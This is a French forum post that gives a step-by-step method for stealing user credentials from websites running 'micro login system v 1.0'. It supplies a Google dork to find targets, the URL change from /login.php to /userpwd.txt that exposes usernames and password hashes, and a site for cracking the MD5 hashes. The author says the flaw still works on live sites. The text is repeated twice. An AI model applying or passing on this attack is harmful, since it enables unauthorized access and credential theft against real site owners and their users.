Salut,
En ce moment, il tourne cette faille assez simple car il suffit simplement de changer le chemin (path) de l'url.Et donc, on récupére les passwords en .txt.
Tapez ce dork: intext:"micro login system v 1.0"
Voila et tous les sites dont l'url aura comme terminaison : /login.php ou /register.php vous changez par /userpwd.txt
ex:
http://www.cible.com/login/login.php
deviens
http://www.cible.com/login/userpwd.txt
Vous attérissez tout droit sur la page avec les pseudos et les pass hasher. Y a plus qu'à aller sur un bon site pour décoder le Hash : http://www.md5online.fr/
Je trouve que des failles comme celle la sont reposantes^^.
Elle est valable encore en ce moment je viens de tester sur la première page.
En ce moment, il tourne cette faille assez simple car il suffit simplement de changer le chemin (path) de l'url.Et donc, on récupére les passwords en .txt.
Tapez ce dork: intext:"micro login system v 1.0"
Voila et tous les sites dont l'url aura comme terminaison : /login.php ou /register.php vous changez par /userpwd.txt
ex:
http://www.cible.com/login/login.php
deviens
http://www.cible.com/login/userpwd.txt
Vous attérissez tout droit sur la page avec les pseudos et les pass hasher. Y a plus qu'à aller sur un bon site pour décoder le Hash : http://www.md5online.fr/
Je trouve que des failles comme celle la sont reposantes^^.
Elle est valable encore en ce moment je viens de tester sur la première page.
Commentaire